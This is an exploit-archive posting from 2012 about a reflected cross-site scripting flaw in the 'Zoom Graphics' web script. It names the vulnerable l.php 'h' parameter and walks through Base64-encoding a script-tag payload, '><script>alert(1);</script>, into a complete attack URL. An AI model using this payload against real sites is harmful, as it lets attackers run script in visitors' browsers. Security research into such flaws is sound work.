Home / exploits Zoom Graphics Cross Site Scripting
Posted on 06 November 2012
+---------------------------------------------------------------------------------------------------------+ # Exploit Title : ZOOM GRAPHICS XSS [B64] Vulnerability # Date : 2012-08-19 # Author : Avatar Fearless # Official Site : http://zoom.am/ # Version : x.x.x [UnKnown] # Tested on : Windows 7 Ultimate x32 # Original Advisory : http://thefear.in/zoomam.txt # Contact : avatar@hiphopfan.com # Web Sites : http://anti-armenia.org/ || http://millikuvvetler.net/ || http://mexfi.org/ # Greet`Z To : Meta +---------------------------------------------------------------------------------------------------------+ [+] Vulnerable : http://site.tld/l.php?l=2&h=[base64 encode] [-] Exploit : Firstable You Will take a XSS Code. Example : '><script>alert(1);</script>. We Have to use only quote not Double quote because if we use than script will parse double quote. And we will encode this code to Base64 . Output : Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg== So it will be like this : http://site.tld/zoom/l.php?l=2&h=Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg== It is just example [?] About : For More Info Contact me. [@] Respect To : All My Bro*S AA Team MF Team MKT Team +---------------------------------------------------------------------------------------------------------+